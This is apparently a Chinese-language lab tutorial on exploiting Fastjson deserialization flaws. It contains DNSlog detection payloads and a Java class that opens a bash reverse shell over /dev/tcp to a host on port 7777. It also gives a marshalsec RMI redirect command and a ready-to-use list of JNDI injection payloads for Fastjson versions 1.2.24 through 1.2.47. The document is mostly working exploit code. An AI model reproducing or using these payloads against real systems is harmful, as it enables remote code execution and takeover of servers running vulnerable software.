一、檢測 1.2.67以下的fastjson
{"@type":“java.net.Inet4Address”,“val”:“dnslog”}
{"@type":“java.net.Inet6Address”,“val”:“dnslog”}
但是有的不成功。
二、利用
Docker搭建環境
2.1生成poc
下面檔案為反彈shell,替換成這一句,dnslog檢測。
String[] commands = {“ping”, “eqkkk1.dnslog.cn”};
建立一個檔案,TouchFile.java
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.88.141/7777 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
2.2 編譯檔案,生成TouchFile.class
Javac TouchFile.java
2.3 啟用web服務,可以通路剛生成的TouchFile.class檔案
2.4 利用marshalsec-0.0.3-SNAPSHOT-all.jar工具進行rmi轉發,我将這個工具和.Class檔案都放在了一個vps上
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.88.141:3333/#TouchFile" 9999
2.5監聽7777端口
2.6通路目标網站,将GET改為POST,并加上exp
Fastjson 1.2.24 版本
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://192.168.88.141:9999/TouchFile","autoCommit":true}}
雖然還沒響應
也可以這樣
反彈成功
其他版本,前面的都一樣,更改包裡面的exp就ok了。
1.2.24
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit", "autoCommit":true}}
未知版本(1.2.24-41之間)
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
1.2.41
{"@type":"Lcom.sun.rowset.RowSetImpl;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
1.2.42
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true};
1.2.43
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true]}
1.2.45
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://localhost:1099/Exploit"}}
1.2.47
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}}